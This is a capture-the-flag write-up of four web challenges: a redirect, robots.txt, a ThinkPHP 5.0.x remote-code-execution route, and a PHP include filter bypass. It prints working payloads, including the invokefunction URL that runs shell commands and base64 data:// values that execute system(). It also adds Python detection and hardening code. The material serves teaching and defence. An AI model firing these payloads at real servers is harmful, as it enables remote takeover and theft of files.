CTF_ Web: Advanced questions of attack and defense world expert zone WP (1-4)
2022-06-25 04:30:00 【AFCC_】
0x00 Preface
The Web challenges in the expert (advanced) zone of 攻防世界 (attack-defense world) mainly test information gathering, protocol understanding, mastery of PHP syntax and similar advanced knowledge. The later the challenge, the harder it gets; I don't know how many I will manage, so this write-up will be kept updated.
0x01 baby_web
Challenge description: think about the initial page.
After opening the challenge, the landing path is 1.php. The most common homepage name is index.php, so I tried that URL and found it immediately redirected back to 1.php. The challenge tests knowledge of 302 redirects: just follow it up in Burp, where intercepting lets you see the 302 response itself before the browser follows it.
0x02 Training-WWW-Robots
From the challenge name it is clear that this one is about robots.txt.
Follow the hint it gives and visit f10g.php; that's all there is to it.
0x03 php_rce
Opening the challenge shows a site built on the ThinkPHP 5.0 framework. ThinkPHP is widely used, and every version has had a large number of vulnerabilities; this challenge tests understanding of the 5.0 branch and information-gathering ability. It is not hard to find that the 5.0.x versions have an RCE vulnerability.
The payload is index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
The current user is returned.
Move up through the directories and cat the file. The final payload is index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cd..%20;cd%20..;%20cd%20..;cd%20..;ls%20flag;cat%20flag
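From the defender's side, the invokefunction route above is very recognisable in web-server logs. The following is an added example (not part of this write-up or of ThinkPHP) that normalises each request target, including percent-encoded variants, and flags the combination of a namespaced route, invokefunction, a call_user_func* callback and a shell function in the vars parameters. The log lines are constructed for the example; the function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines in combined format (not real traffic). Lines 1 and 2
# carry the invokefunction route from the write-up, the second one percent-encoded;
# lines 3 and 4 are ordinary ThinkPHP requests and must not match.
SAMPLE_LOG = r"""
10.0.0.5 - - [25/Jun/2022:04:30:00 +0800] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 512
10.0.0.6 - - [25/Jun/2022:04:31:10 +0800] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=id HTTP/1.1" 200 498
10.0.0.7 - - [25/Jun/2022:04:32:00 +0800] "GET /index.php?s=index/user/login HTTP/1.1" 200 1043
10.0.0.8 - - [25/Jun/2022:04:33:00 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 120
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
DANGEROUS_CALLBACKS = {"call_user_func_array", "call_user_func"}
SHELL_FUNCTIONS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}


def detect_thinkphp_invoke(target):
    """Return the list of indicators found in one request target ([] when benign)."""
    # Decode twice so that single- and double-percent-encoded variants normalise
    # to the same text; everything below is compared case-insensitively.
    decoded = unquote_plus(unquote_plus(target))
    query = parse_qs(urlsplit(decoded).query, keep_blank_values=True)
    route = query.get("s", [""])[0].lower()
    indicators = []
    if "\\think\\" in route:
        indicators.append("namespace path in route (s=) parameter")
    if "invokefunction" in route:
        indicators.append("invokefunction in route")
    func = query.get("function", [""])[0].lower()
    if func in DANGEROUS_CALLBACKS:
        indicators.append("function=" + func)
    for key, values in query.items():
        if key.lower().startswith("vars") and any(v.lower() in SHELL_FUNCTIONS for v in values):
            indicators.append(key + " names a shell function")
    return indicators


def scan_log(text):
    """Return (client_ip, target, indicators) for each request that looks like an invokefunction attempt."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        indicators = detect_thinkphp_invoke(match.group("target"))
        if indicators:
            hits.append((line.split()[0], match.group("target"), indicators))
    return hits


if __name__ == "__main__":
    for ip, target, why in scan_log(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(why))
```

Flagging on the combination rather than on a single keyword keeps false positives down: a legitimate route such as index/user/login never contains a backslash namespace or a call_user_func* callback, while the two attack lines score on all four indicators even when percent-encoded.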
0x04 Web_php_include
Challenge description: none.
From the challenge source you can see that the php:// wrapper (pseudo-protocol) is blocked, but the check is done with strstr, which is case-sensitive, so PHP:// still gets through; the data:// wrapper can likewise be used to include malicious code and read sensitive information.
'php://input' is a read-only stream that gives access to the raw request body; the data in the POST request is executed as PHP code.
'data://text/plain;base64,' decodes the base64 content that follows the comma and includes it directly.
When passing the value of the page parameter, base64-encode the content so that special characters are not mangled by the browser.
In this challenge the two statements
<?php system('dir');
<?php system('cat xxxx.php');
are encoded to
PD9waHAgc3lzdGVtKCdkaXInKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmw0Z2lzaXNpc2gzcjMucGhwJyk7
Both methods pass the parameter in the same way: first list the directory contents, then cat the corresponding file.
Use page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmw0Z2lzaXNpc2gzcjMucGhwJyk7
View the page source to get the flag.
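The root cause here is a case-sensitive substring check standing in for input validation. The following added example (my own code, not the challenge's PHP) models the weak strstr-style check beside a hardened version that rejects any wrapper prefix case-insensitively and only accepts allowlisted page names, and includes a small decoder showing what a base64 data:// value would hand to include(). The filter names, the allowlist and the test values are constructed for the example.

```python
import base64
import re


# Weak check, modelling the challenge's case-sensitive strstr() test as described in
# the write-up: it blocks only an exact lowercase "php://" substring.
def weak_page_filter(page):
    """Return True when the value would be accepted (passed on to include)."""
    return "php://" not in page


# Hardened check (added here, not the challenge's code): reject any value that starts
# with a URL scheme, case-insensitively, and additionally require the page to be on an
# allowlist, so neither PHP:// nor data:// nor a traversal path reaches include().
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.IGNORECASE)
ALLOWED_PAGES = {"home", "about", "contact"}  # hypothetical page names


def hardened_page_filter(page):
    """Return True only for an allowlisted local page name with no wrapper prefix."""
    if SCHEME_RE.match(page):
        return False
    return page in ALLOWED_PAGES


DATA_B64_RE = re.compile(r"^data:(?://)?[^,]*;base64,(.+)$", re.IGNORECASE | re.DOTALL)


def decode_data_wrapper(page):
    """Return the text a data:...;base64, value would make include() execute, or None."""
    match = DATA_B64_RE.match(page)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-8", errors="replace")


# Constructed inputs: the write-up's lowercase/uppercase php:// and its first data://
# payload, plus a legitimate page name and a traversal attempt.
TEST_VALUES = [
    "php://input",
    "PHP://input",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCdkaXInKTs=",
    "home",
    "../../etc/passwd",
]


def compare(values):
    """Map each value to (accepted_by_weak_filter, accepted_by_hardened_filter)."""
    return {v: (weak_page_filter(v), hardened_page_filter(v)) for v in values}


if __name__ == "__main__":
    for value, (weak, hard) in compare(TEST_VALUES).items():
        print(f"{value!r:60} weak={weak} hardened={hard}")
    print(decode_data_wrapper(TEST_VALUES[2]))
```

In PHP terms, swapping strstr for the case-insensitive stristr would close the PHP:// variant but still leave data://, file paths and traversal open; an allowlist of page names (or a fixed directory plus basename) is what actually removes the include-of-attacker-data problem.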